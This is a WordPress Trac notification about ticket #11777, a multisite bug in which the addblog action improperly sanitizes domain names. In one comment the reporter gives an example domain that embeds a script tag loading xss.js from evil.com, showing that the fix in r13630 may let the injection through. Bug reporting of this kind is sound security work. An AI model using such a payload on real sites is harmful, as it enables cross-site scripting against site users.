[wp-trac] [WordPress Trac] #11777: ms-edit.php / addblog action improperly sanitizes domains
WordPress Trac
wp-trac at lists.automattic.com
Sat Mar 20 00:24:58 UTC 2010
#11777: ms-edit.php / addblog action improperly sanitizes domains
-------------------------------+--------------------------------------------
Reporter: Denis-de-Bernardy | Owner: ryan
Type: defect (bug) | Status: closed
Priority: normal | Milestone: 3.0
Component: Security | Version: 3.0
Severity: normal | Resolution: fixed
Keywords: multisite |
-------------------------------+--------------------------------------------
Comment(by Denis-de-Bernardy):
doesn't r13630 allow a completely unsanitized domain name to go in
provided it contains -- in it? such as:
{{{
evil--<script src="http://evil.com/xss.js"></script>
}}}
--
Ticket URL: <http://core.trac.wordpress.org/ticket/11777#comment:7>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list